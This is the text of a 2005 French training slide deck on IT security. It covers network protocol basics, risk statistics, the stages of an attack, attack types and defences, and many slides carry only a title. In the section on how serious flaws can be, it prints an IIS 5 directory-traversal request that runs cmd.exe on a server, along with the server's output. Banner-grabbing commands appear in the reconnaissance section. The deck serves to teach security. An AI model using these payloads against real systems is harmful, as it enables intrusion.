Vous êtes sur la page 1sur 75

RES_06

1 journée

Comprendre les tenants et


les aboutissants de la
sécurité informatique

2005 Lionel PARBHAKAR pour le CIEFA-IPI


Important

Avant d’aborder ce cours, vous devez :


„ Maîtriser le cours RES_04 :
1. Introduction aux matériels réseau
2. Introduction aux vers, virus et à la sécurité applicative
3. Introduction aux sauvegardes et à la sécurité logicielle
4. Introduction aux méthodologies de sécurisation d’un
poste de travail
„ Maîtriser le cours RES_05 :
1. Les réseaux informatiques
2. TCP, UDP et leurs applications (« three-way
handshake », etc. …
3. IP, l’adressage et les applications
4. Les services courants
2005 Lionel PARBHAKAR pour le CIEFA-IPI
Objectifs de ce cours
A la fin de ce cours, vous serez à même de :

„ Comprendre comment se déroule une attaque


informatique

„ Comprendre les enjeux de la sécurité informatique

„ Différencier les différents types d’attaque

„ Concevoir les méthodologies à mettre en œuvre


pour prévenir les attaques

„ Passer à la partie pratique : WIN_06 ou AUX_06


2005 Lionel PARBHAKAR pour le CIEFA-IPI
Plan du cours

„ Révision des notions fondamentales sur les


réseaux Informatiques
„ L’évolution des risques
„ Méthodologie d’attaque
„ Exemple d’attaque : l’attaque de Kevin Mitnick

2005 Lionel PARBHAKAR pour le CIEFA-IPI


Première partie

„ Révision des notions fondamentales sur les


réseaux Informatiques
„ L’évolution des risques
„ Méthodologie d’attaque
„ Exemple d’attaque : l’attaque de Kevin Mitnick

2005 Lionel PARBHAKAR pour le CIEFA-IPI


Plan de la première partie

„ Révision des notions fondamentales sur


les réseaux Informatiques
1. Le modèle OSI
2. Le modèle TCP/IP
3. La pile de protocole TCP/IP
4. Le protocole IP
5. Le protocole ICMP
6. Le protocole UDP
7. Le protocole TCP
8. Les protocoles applicatifs
2005 Lionel PARBHAKAR pour le CIEFA-IPI
Plan de la première partie

„ Révision des notions fondamentales sur


les réseaux Informatiques
1. Le modèle OSI
2. Le modèle TCP/IP
3. La pile de protocole TCP/IP
4. Le protocole IP
5. Le protocole ICMP
6. Le protocole UDP
7. Le protocole TCP
8. Les protocoles applicatifs
2005 Lionel PARBHAKAR pour le CIEFA-IPI
1 - Le Modèle OSI (1/2)

2005 Lionel PARBHAKAR pour le CIEFA-IPI


1 – Le Modèle OSI (2/2)

„ OSI pour : “Open System Interconnection”

„ C’est un standard de communication créé en 1978 par


l’ISO (« International Standards Organism »)

„ Il représente les différentes couches d'une liaison


réseau informatique

„ Permet la compatibilité des produits (logiciels ou


matériels) en vue d’une mise en réseau et ce quel que
soit le constructeur ou l’éditeur de logiciel

„ C’est un Modèle théorique


2005 Lionel PARBHAKAR pour le CIEFA-IPI
Plan de la première partie

„ Révision des notions fondamentales sur


les réseaux Informatiques
1. Le modèle OSI
2. Le modèle TCP/IP
3. La pile de protocole TCP/IP
4. Le protocole IP
5. Le protocole ICMP
6. Le protocole UDP
7. Le protocole TCP
8. Les protocoles applicatifs
2005 Lionel PARBHAKAR pour le CIEFA-IPI
2 - Le Modèle TCP/IP (1/2)

2005 Lionel PARBHAKAR pour le CIEFA-IPI


2 - Le Modèle TCP/IP (2/2)

„ TCP/IP : Transmission Control Protocol / Internet


Protocol.

„ Créé par le DoD (« Department of Defense »)


américain et dont l’existence officieuse est daté de
1964, il fut normalisé en 1980 sur le modèle OSI.

„ Les couches de la pile TCP/IP ont des tâches


beaucoup plus diverses que les couches du modèle
OSI, du fait de leur nombre plus réduit.

„ Le principe d’encapsulation reste valable.


2005 Lionel PARBHAKAR pour le CIEFA-IPI
Plan de la première partie

„ Révision des notions fondamentales sur


les réseaux Informatiques
1. Le modèle OSI
2. Le modèle TCP/IP
3. La pile de protocole TCP/IP
4. Le protocole IP
5. Le protocole ICMP
6. Le protocole UDP
7. Le protocole TCP
8. Les protocoles applicatifs
2005 Lionel PARBHAKAR pour le CIEFA-IPI
3 - La Pile TCP/IP (1/2)

„ La gestion de la présentation
des données ainsi que celle des Pile TCP/IP
sessions sont laissées au soin
du développeur de l’application. Couche Application: (message)

Applications réseau (ex. HTTP, FTP, SMTP...)

„ La couche transport assure les Couche Transport: (segment)


mêmes fonctions que sont TCP ou UDP
homologue du modèle OSI,
pareillement pour la couche Couche Internet: (datagramme)

Internet qui correspond à la IP, ARP, RARP, ICMP


couche « réseau » OSI. Couche Accès réseau: (trame)

FDDI, PPP, ATM, Ethernet, Token Ring


„ Les couches basses du modèle
OSI se retrouvent pleinement Couche Physique

dans le modèle TCP/IP. (ex. câble coaxial, paire cuivre, fibre optique...)

2005 Lionel PARBHAKAR pour le CIEFA-IPI


3 - La Pile TCP/IP (2/2)
„ Couche Physique : Protocole d’architecture
{ Exemple : le protocole Ethernet, adresses physiques Ethernet personnalisées

„ Couche Réseau : Protocole d’adressage de réseau et de communication


{ IP : Internet Protocol
Protocole d’adressage, il sert à identifier un hôte sur un réseau
{ ARP : Address Resolution Protocol
Obtient l'adresse physique d’une machine à partir de son adresse IP.
{ RARP : Reverse Address Resolution Protocol
Obtient l'adresse IP d’une machine à partir de son adresse physique.
{ ICMP : Internet Control Message Protocol
Il implémente un contrôle sur un protocole qui n’en utilise pas (IP) et sert à la gestion.

„ Couche Transport : Protocole d’adressage de service et de


communication
{ TCP : Transport Control Protocol
Transport de flux d'informations en mode connecté. Largement utilisé.
{ UDP : User Datagram Protocol
Protocole en mode non connecté, pour l'échange (non fiable) de données.

2005 Lionel PARBHAKAR pour le CIEFA-IPI


Plan de la première partie

„ Révision des notions fondamentales sur


les réseaux Informatiques
1. Le modèle OSI
2. Le modèle TCP/IP
3. La pile de protocole TCP/IP
4. Le protocole IP
5. Le protocole ICMP
6. Le protocole UDP
7. Le protocole TCP
8. Les protocoles applicatifs
2005 Lionel PARBHAKAR pour le CIEFA-IPI
4 - Le Protocole IP (1/2)

„ IP : Internet Protocol

„ Le but du protocole IP est l’adressage. Il permet ainsi à des


hôtes de communiquer.

„ La couche qui contient le protocole IP contient également les


protocoles de routage permettant l’acheminement des
paquets.

„ Codé sur 4 octets, il n’assure aucun contrôle sur la réussite


ou non de l’acheminement des données entre un point A et un
point B.
2005 Lionel PARBHAKAR pour le CIEFA-IPI
4 - Le Protocole IP (2/2)
„ IPv4 : „ Anatomie d’une adresse IP :
{ Adressage sur 32 bits { NetID : Numéro de réseau
{ Capacité: 2^32, environ 4 * 10^9 { HostID : Numéro d’hôte
adresses
„ Adresses réseaux spéciales :
„ IPv6 :
{ 10.0.0.0/8 : Réservé pour
{ Adressage sur 128 bits usage interne
{ Capacité: 2^128, env. 3.4 * 10^38 { 127.0.0.0/8 : Loopback (boucle
adresses interne, "localhost")
{ 172.16.0.0/16 à 172.31.0.0/16
: Réservé pour usage interne
„ Classes d'adresses IPv4 : { 192.168.0.0/24 à
{ Classe A: réseaux 1 à 127 192.168.255.0/24 : Réservé
{ Classe B: réseaux 128.0 à pour usage interne
191.255 { Autres réseaux spéciaux:
{ Classe C: réseaux 192.0.0 à Multicast, Unicast
223.255.255
{ Il existe aussi la classe D
(multicast) et E (réservée)
2005 Lionel PARBHAKAR pour le CIEFA-IPI
Plan de la première partie

„ Révision des notions fondamentales sur


les réseaux Informatiques
1. Le modèle OSI
2. Le modèle TCP/IP
3. La pile de protocole TCP/IP
4. Le protocole IP
5. Le protocole ICMP
6. Le protocole UDP
7. Le protocole TCP
8. Les protocoles applicatifs
2005 Lionel PARBHAKAR pour le CIEFA-IPI
5 - Le Protocole ICMP

„ ICMP : Internet Control Message (and Error) Protocol

„ Protocole particulier implémenté au niveau de la couche Internet et dont le but est le contrôle des erreurs du
protocole IP (pertes de données au niveau IP, contrôle de transaction IP, etc …)

„ Protocole utilisant un type d’erreur, à ce type est associé un code précisant l’erreur.

„ Exemple d’applications s’appuyant sur le protocole ICMP: Ping, Traceroute

Exemple de traceroute :
root@debian# traceroute -I www.google.fr
traceroute to www.google.fr (217.12.3.11), 30 hops max, 38 byte packets
1 1 ms <1 ms <1 ms ROOTY [192.168.2.11]
2 18 ms 17 ms 17 ms 1.227.39-62.rev.gaoland.net [62.39.227.1]
3 * * * Délai d'attente de la demande dépassé.
4 20 ms * * V4073.cbv3-co-1.gaoland.net [62.39.148.85]
5 16 ms 17 ms 17 ms prs-b2-geth6-2.telia.net [213.248.70.237]
6 21 ms 18 ms 17 ms 213.248.70.13
7 27 ms 28 ms 24 ms ldn-bb2-pos7-0-0.telia.net [213.248.65.113]

2005 Lionel PARBHAKAR pour le CIEFA-IPI


Plan de la première partie

„ Révision des notions fondamentales sur


les réseaux Informatiques
1. Le modèle OSI
2. Le modèle TCP/IP
3. La pile de protocole TCP/IP
4. Le protocole IP
5. Le protocole ICMP
6. Le protocole UDP
7. Le protocole TCP
8. Les protocoles applicatifs
2005 Lionel PARBHAKAR pour le CIEFA-IPI
5 - Le Protocole UDP
„ UDP : User Datagram Protocol

„ C’est un protocole implémenté au sein de la couche Transport

„ Il utilise un mode de transmission en mode non connecté

„ Plus rapide que TCP : pas d’accusé de réception, ni de séquences particulières


d’ouverture de connexion avant l’acheminement des données de la
communication

„ Utilisé pour les applications qui ont des besoins de débits importants, et pour
lesquelles l’ordre d’arrivée des données, et/ou la sécurité de leur acheminement
n’est pas nécessaire ; exemple : jeux vidéos sur Internet ou en réseaux local ;
visio conférence

„ Utilise des numéros de ports pour permettre plusieurs applications simultanées

„ Exemple: DNS (port 53)


2005 Lionel PARBHAKAR pour le CIEFA-IPI
Plan de la première partie

„ Révision des notions fondamentales sur


les réseaux Informatiques
1. Le modèle OSI
2. Le modèle TCP/IP
3. La pile de protocole TCP/IP
4. Le protocole IP
5. Le protocole ICMP
6. Le protocole UDP
7. Le protocole TCP
8. Les protocoles applicatifs
2005 Lionel PARBHAKAR pour le CIEFA-IPI
7 - Le Protocole TCP
„ TCP : Transmission Control Protocol

„ Protocole implémenté au niveau de la couche Transport

„ Protocole en mode connecté : émule une connexion à l’image des protocoles de type X25
(attention, il n’y a pas de circuit virtuel en TCP comme en X25)

„ Protocole gérant l’état des connexions à l’aide d’identificateurs appelés “flags” ou fanions ou
drapeaux (SYN, ACK, RST, URG, PSH, FIN)

„ Communication de données en 3 phases :


* Etablissement de la connexion (négociation de la connexion en 3 temps : “three way
handshake”)
* Phase de communication (emission des données)
* Fermeture de la connexion (émission de demande de fin de connexion)

„ Sécurité des données grâce à l’accusé de réception des données (à l’image du courrier postal,
emettre une donnée en TCP c’est envoyer un courrier recommandé, a l’instar d’UDP qui peut
être comparé à un courrier postal normal)

„ Utilise des numéros de ports permettant d'avoir plusieurs connexions simultanées (ex. 80 HTTP,
21 FTP)
2005 Lionel PARBHAKAR pour le CIEFA-IPI
Plan de la première partie

„ Révision des notions fondamentales sur


les réseaux Informatiques
1. Le modèle OSI
2. Le modèle TCP/IP
3. La pile de protocole TCP/IP
4. Le protocole IP
5. Le protocole ICMP
6. Le protocole UDP
7. Le protocole TCP
8. Les protocoles applicatifs
2005 Lionel PARBHAKAR pour le CIEFA-IPI
8 - Les Protocoles applicatifs
„ Couche Applications et Services :
{ HTTP : Utilisé pour le Web, utilise TCP sur port 80.

{ FTP : Utilisé pour le transfert de fichiers, utilise TCP sur port 21 (côté serveur).

{ SMTP : Utilisé pour la transmission des E-mails (TCP sur port 25). Egalement POP3 et
IMAP.

{ DNS : Utilisé pour la résolution des noms de domaines (UDP sur port 53).

{ SSH (Secure Shell) : Utilisé pour le cryptage des données (TCP port 22 côté serveur).

{ Telnet : permet de relier un client à un interpréteur de commande distant (TCP port 23).

{ DHCP (Dynamic Host Configuration Protocol) : Adressage IP automatique


(répartition automatique d’adresses IP entre autres…). Utilise UDP port 67 côté serveur
et 68 côté client.

{ SNMP : Utilisé surtout sur les routeurs, permet la gestion et le diagnostique des réseaux
en général. Utilise UDP port 161 côté agent et 162 côté station de management.

2005 Lionel PARBHAKAR pour le CIEFA-IPI


Fin de la première partie

„ Révision des notions fondamentales


sur les réseaux Informatiques
Questions de compréhension :
1. Qu’est ce qu’une WinSize ?
2. Comment fonctionnent les buffers des processus
réseaux ?
3. DNS utilise t’il UDP ? TCP ? Dans quel cas l’un et
dans quel cas l’autre ?
4. Comment peut on connaître en temps réel l’état
des connexions réseau d’un hôte ?

2005 Lionel PARBHAKAR pour le CIEFA-IPI


Deuxième partie

„ Révision des notions fondamentales sur les


réseaux Informatiques
„ L’évolution des risques
„ Méthodologie d’attaque
„ Exemple d’attaque : l’attaque de Kevin Mitnick

2005 Lionel PARBHAKAR pour le CIEFA-IPI


Plan de la seconde partie

„ L’évolution des risques


1. L’équation de la sécurité
2. Évolution des incidents
3. Évolution des vulnérabilités
4. Criticité des failles
5. Mode d’exploitation
6. Impacts
7. Ports les plus attaqués
8. Motifs d’attaques
2005 Lionel PARBHAKAR pour le CIEFA-IPI
Plan de la seconde partie

„ L’évolution des risques


1. L’équation de la sécurité
2. Évolution des incidents
3. Évolution des vulnérabilités
4. Criticité des failles
5. Mode d’exploitation
6. Impacts
7. Ports les plus attaqués
8. Motifs d’attaques
2005 Lionel PARBHAKAR pour le CIEFA-IPI
1 - L’équation

„ Qu’est ce que le risque informatique ?

„ Risque = M * V * I

„ M = (Menace théorique / Contre Mesure 1)

„ V = (Vulnérabilité théorique / Contre Mesure 2)

„ I = (Impact théorique / Contre Mesure 3)

2005 Lionel PARBHAKAR pour le CIEFA-IPI


Plan de la seconde partie

„ L’évolution des risques


1. L’équation de la sécurité
2. Évolution des incidents
3. Évolution des vulnérabilités
4. Criticité des failles
5. Mode d’exploitation
6. Impacts
7. Ports les plus attaqués
8. Motifs d’attaques
2005 Lionel PARBHAKAR pour le CIEFA-IPI
2 - Évolution des incidents (1/3)

2005 Lionel PARBHAKAR pour le CIEFA-IPI


2 - Évolution des incidents (2/3)

„ Accroissement du nombre de particuliers et


d’entreprises connectés au réseau mondial

„ Accroissement des transferts d’information à


travers Internet

„ Développement des services mis à disposition des


internautes

„ Développement des outils nocifs mis à disposition


des internautes

2005 Lionel PARBHAKAR pour le CIEFA-IPI


2 - Évolution des incidents (3/3)

„ En France : 90% des réseaux informatiques sont vulnérables


65% des entreprises sont victimes d’intrusions
95% de ces intrusions ne sont même pas détectées

„ Dans le Monde :
„ En 2004, les attaques informatiques ont représenté un coût global de 1600 milliards de
dollars.

„ En 2004, 85% des entreprises et des services publics américains ont rapporté une
intrusion informatique telle qu'un vol d'information propriétaire, une fraude financière,
l'intrusion de personnes extérieures dans leur système, une attaque de déni de service
ou un sabotage de leurs données ou réseau.

„ 40% des entreprises interrogées ont rapporté une intrusion par un tiers extérieur en
2004 (20% en 1997) et 38% ont détecté une attaque de type Déni de service (24% en
1998).

(Source: 2004 Computer Crime & Security Survey, Computer Security Institute).

2005 Lionel PARBHAKAR pour le CIEFA-IPI


Plan de la seconde partie

„ L’évolution des risques


1. L’équation de la sécurité
2. Évolution des incidents
3. Évolution des vulnérabilités
4. Criticité des failles
5. Mode d’exploitation
6. Impacts
7. Ports les plus attaqués
8. Motifs d’attaques
2005 Lionel PARBHAKAR pour le CIEFA-IPI
3 - Évolution des vulnérabilités (1/2)

2005 Lionel PARBHAKAR pour le CIEFA-IPI


3 - Évolution des vulnérabilités (2/2)

„ Accroissement du nombre de logiciels utilisés via


Internet

„ Développement de systèmes d’exploitations


généralistes, gérant tout un flot de tâche Î
Accroissement du nombre de lignes de code des
Systèmes d’Exploitation et donc des vulnérabilités

„ Développement des progiciels d’entreprise

„ Développement des outils nocifs mis à disposition


des internautes
2005 Lionel PARBHAKAR pour le CIEFA-IPI
Plan de la seconde partie

„ L’évolution des risques


1. L’équation de la sécurité
2. Évolution des incidents
3. Évolution des vulnérabilités
4. Criticité des failles
5. Mode d’exploitation
6. Impacts
7. Ports les plus attaqués
8. Motifs d’attaques
2005 Lionel PARBHAKAR pour le CIEFA-IPI
4 - Criticité des failles (1/2)

2005 Lionel PARBHAKAR pour le CIEFA-IPI


4 - Criticité des failles (2/2)
Exemple de faille : Un serveur IIS 5.x peut être sensible aux attaques de type URL encodées

$ echo "GET /scripts/..%255c..%255c..%255cwinnt/System32/cmd.exe?/c+dir+c:\\ HTTP/1.0 " | stunnel -c -r


137.194.200.214:443

HTTP/1.1 200 OK Server: Microsoft-IIS/5.0


Server: Microsoft-IIS/5.0
Date: Fri, 17 Jun 2002 19:47:35 GMT
Content-Type: application/octet-stream
Le volume dans le lecteur C n'a pas de nom.
Le numero de serie du volume est 9C5F-0FCD
Repertoire de c:\
01/01/2000 01:19 <DIR> Documents and Settings
01/01/2000 01:19 <DIR> I386
10/06/2002 21:44 <DIR> Inetpub
05/05/2002 19:17 <DIR> My Music
17/06/2002 19:26 <DIR> Program Files
17/05/2002 16:18 600 PUTTY.RND
25/04/2002 06:21 <DIR> TEMP
18/06/2002 20:46 <DIR> WINNT
1 fichier(s) 1á223á476 octets
7 Rep(s) 3á385á342á976 octets libres
2005 Lionel PARBHAKAR pour le CIEFA-IPI
Plan de la seconde partie

„ L’évolution des risques


1. L’équation de la sécurité
2. Évolution des incidents
3. Évolution des vulnérabilités
4. Criticité des failles
5. Mode d’exploitation
6. Impacts
7. Ports les plus attaqués
8. Motifs d’attaques
2005 Lionel PARBHAKAR pour le CIEFA-IPI
5 - Mode d’exploitation

2005 Lionel PARBHAKAR pour le CIEFA-IPI


Plan de la seconde partie

„ L’évolution des risques


1. L’équation de la sécurité
2. Évolution des incidents
3. Évolution des vulnérabilités
4. Criticité des failles
5. Mode d’exploitation
6. Impacts
7. Ports les plus attaqués
8. Motifs d’attaques
2005 Lionel PARBHAKAR pour le CIEFA-IPI
6 - Impacts

2005 Lionel PARBHAKAR pour le CIEFA-IPI


Plan de la seconde partie

„ L’évolution des risques


1. L’équation de la sécurité
2. Évolution des incidents
3. Évolution des vulnérabilités
4. Criticité des failles
5. Mode d’exploitation
6. Impacts
7. Ports les plus attaqués
8. Motifs d’attaques
2005 Lionel PARBHAKAR pour le CIEFA-IPI
7 - Ports les plus attaqués

2005 Lionel PARBHAKAR pour le CIEFA-IPI


Plan de la seconde partie

„ L’évolution des risques


1. L’équation de la sécurité
2. Évolution des incidents
3. Évolution des vulnérabilités
4. Criticité des failles
5. Mode d’exploitation
6. Impacts
7. Ports les plus attaqués
8. Motifs d’attaques
2005 Lionel PARBHAKAR pour le CIEFA-IPI
8 - Motifs d’attaque

2005 Lionel PARBHAKAR pour le CIEFA-IPI


Fin de la seconde partie

„ L’évolution des risques


Questions de compréhension :
1. Quelle est l’équation des risques ?
2. Quels sont les facteurs de l’accroissement des
vulnérabilités ?
3. Quel est le service le plus attaqué ?
4. Quel est le plus grand motif d’attaque d’un site
Internet ?

2005 Lionel PARBHAKAR pour le CIEFA-IPI


Troisième partie

„ Révision des notions fondamentales sur les


réseaux Informatiques
„ L’évolution des risques
„ Méthodologie d’attaque
„ Exemple d’attaque : l’attaque de Kevin Mitnick

2005 Lionel PARBHAKAR pour le CIEFA-IPI


Plan de la troisième partie

„ Méthodologie d’attaque
1. Les étapes
2. La recherche d’informations
3. La recherche de vulnérabilités
4. L’élimination des failles non fondées
5. Exploitation des vulnérabilités
6. Nettoyage
7. Les causes d’attaque réseau
8. Les types d’attaque réseau
9. Les solutions
2005 Lionel PARBHAKAR pour le CIEFA-IPI
Plan de la troisième partie

„ Méthodologie d’attaque
1. Les étapes
2. La recherche d’informations et de
vulnérabilités
3. Les causes d’attaque réseau
4. Les types d’attaque réseau
5. Les solutions

2005 Lionel PARBHAKAR pour le CIEFA-IPI


1 - Les étapes
„ Recherche d’informations
Î Cartographie du réseau à l’aide d’outils communs et basiques, ou spécialisés

„ Recherche de vulnérabilités
Î Analyse des ports ouverts, des services, et des versions des applications

„ Éliminer les failles non fondées


Î Recherche d’information sur les failles en fonction du but recherché

„ Tentative d’exploitation de ces vulnérabilités : élévation de privilèges


Î Le but ? : obtenir un accès voire plus

„ Compromission des machines ou des serveurs


Î Afin d’ouvrir une « porte dérobée » (backdoor)

„ Nettoyage
Î Suppression des traces afin de passer inaperçu
2005 Lionel PARBHAKAR pour le CIEFA-IPI
Plan de la troisième partie

„ Méthodologie d’attaque
1. Les étapes
2. La recherche d’informations et de
vulnérabilités
3. Les causes d’attaque réseau
4. Les types d’attaque réseau
5. Les solutions

2005 Lionel PARBHAKAR pour le CIEFA-IPI


2 - Recherche d’informations (1/4)

„ Recherche d’informations dites publiques


{ DNS avec dig ou nslookup, RIPE avec whois, etc …

„ Découverte du réseau ou des matériels actifs


{ Traceroute ou ping pour vérifier que l’ICMP passe ou non
{ Hping pour créer des paquets particuliers, etc …

„ Découverte des systèmes d’exploitation


{ Nmap, queso, etc …

„ Découverte des services ouverts


{ Nmap, udp-scan, etc …

„ Découverte des versions logicielles


{ telnet, netcat, nessus, etc …

2005 Lionel PARBHAKAR pour le CIEFA-IPI


2 - Recherche d’informations (2/4)

„ Analyse des ports classiques

„ Ports TCP : la plupart des services classiques sont souvent


ouverts (21, 22, 23, 25, 80, …)

„ Ports UDP : scan de port fermé : flag RST


Facilement filtrable par firewall… => le seul moyen est alors de
tester les applications courantes ftp

„ Scan NMAP (exemple : option –0 sur chaque port => assurance


de bonnes indications sur l’OS)

2005 Lionel PARBHAKAR pour le CIEFA-IPI


2 - Recherche d’informations (3/4)

„ En cas de présence d’un routeur passerelle connu du réseau :


essai d’adresses internes pour l’IP Spoofing …

„ Travail sur les TTL (afin de déterminer l’architecture réseau)

„ Passage mode passif du FTP (pasv) pour trouver l’adresse


interne par exemple

„ Exploitation de services comme SMTP, etc …

„ Failles et exploitations des services DNS mal configurés

2005 Lionel PARBHAKAR pour le CIEFA-IPI


2 - Recherche d’informations (4/4)
„ RECHERCHE DE BANNIERES
w Service FTP :
$ ftp 137.194.200.214
Connected to 137.194.200.214.
220 FTP server (Hummingbird Communications Ltd. (HCLFTPD)
Version 6.1.0.0) ready.

w Service SSH :
$ telnet 137.194.200.214 22
Trying 137.194.200.214...
Connected to 137.194.200.214.
Escape character is '^]'.
SSH-1.99-OpenSSH_3.0.2p1 Debian 1:3.0.2p1-9

w Service Telnet :
$ telnet 137.194.200.214
Debian GNU/Linux 2.2 serveur.ssir.com
Login :

w Service SMTP :
$ telnet 137.194.200.214 25
...
220 serveur.ssir.com ESMTP Exim 3.12 #1 Mon, 10 Jun 2002 22:56:32 +0200
2005 Lionel PARBHAKAR pour le CIEFA-IPI
Plan de la troisième partie

„ Méthodologie d’attaque
1. Les étapes
2. La recherche d’informations et de
vulnérabilités
3. Les causes d’attaque réseau
4. Les types d’attaque réseau
5. Les solutions

2005 Lionel PARBHAKAR pour le CIEFA-IPI


3 - Les causes d’attaques réseau

„ Problèmes de compétences : les moyens humains, manque de formation

„ Problèmes de configuration du réseau ou des postes ou serveurs

„ Droits d'accès mal gérés

„ Buffer overflow (utilisation de logiciels mal programmés)

„ Race condition (signal d’interruption, droits d’accès, ouverture de fichiers par plusieurs
utilisateurs simultanés)

„ Utilisation de comptes par défaut, mots de passe faibles et non sécurisés

„ Utilisation des failles dans les protocoles ou logiciels

„ Développement via Internet d’outils permettant le piratage … L0phtcrack, hunt, nessus, etc…

2005 Lionel PARBHAKAR pour le CIEFA-IPI


Plan de la troisième partie

„ Méthodologie d’attaque
1. Les étapes
2. La recherche d’informations et de
vulnérabilités
3. Les causes d’attaque réseau
4. Les types d’attaque réseau
5. Les solutions

2005 Lionel PARBHAKAR pour le CIEFA-IPI


4 - Types d’attaques réseau
„ Le Social Engineering

„ Les attaques par Brute Force

„ Le Sniffing

„ L’IP Spoofing

„ Le TCP Hijacking (vol de session TCP)

„ Les attaques aux code web : Navigateurs, Java, JavaScripts, applets hostiles, etc …

„ Les Chevaux de Troie (trojans)

„ Les Vers et Virus (worms)

„ Les Backdoors (failles logicielles ou systèmes)

„ Les Buffer Overflow

„ Le Denial of Service
2005 Lionel PARBHAKAR pour le CIEFA-IPI
Plan de la troisième partie

„ Méthodologie d’attaque
1. Les étapes
2. La recherche d’informations et de
vulnérabilités
3. Les causes d’attaque réseau
4. Les types d’attaque réseau
5. Les solutions

2005 Lionel PARBHAKAR pour le CIEFA-IPI


5 - Attaques réseaux – Solutions

„ Politique de sécurité physique


„ Protection des mots de passe (shadow)
„ Cryptographie (symétrique / asymétrique)
„ Certificats
„ Filtrage par routage
„ Firewalls, DMZ, IDS,…
„ NAT, Proxies, … (IP cachées)
„ Formation des utilisateurs

2005 Lionel PARBHAKAR pour le CIEFA-IPI


Fin de la troisième partie

„ L’évolution des risques


Questions de compréhension :
1. Qu’est ce que le Buffer Overflow ?
2. Qu’est ce que le Race Condition ?
3. Qu’est ce que la recherche de bannières ?
4. Qu’est ce que le DoS ?

2005 Lionel PARBHAKAR pour le CIEFA-IPI


Troisième partie

„ Révision des notions fondamentales sur les


réseaux Informatiques
„ L’évolution des risques
„ Méthodologie d’attaque
„ Exemple d’attaque : l’attaque de Kevin Mitnick

2005 Lionel PARBHAKAR pour le CIEFA-IPI


L’attaque de Kevin Mitnick (1/8)

2005 Lionel PARBHAKAR pour le CIEFA-IPI


L’attaque de Kevin Mitnick (2/8)

2005 Lionel PARBHAKAR pour le CIEFA-IPI


L’attaque de Kevin Mitnick (3/8)

2005 Lionel PARBHAKAR pour le CIEFA-IPI


L’attaque de Kevin Mitnick (4/8)

2005 Lionel PARBHAKAR pour le CIEFA-IPI


L’attaque de Kevin Mitnick (5/8)

2005 Lionel PARBHAKAR pour le CIEFA-IPI


L’attaque de Kevin Mitnick (6/8)

2005 Lionel PARBHAKAR pour le CIEFA-IPI


L’attaque de Kevin Mitnick (7/8)

2005 Lionel PARBHAKAR pour le CIEFA-IPI


L’attaque de Kevin Mitnick (8/8)

2005 Lionel PARBHAKAR pour le CIEFA-IPI

Vous aimerez peut-être aussi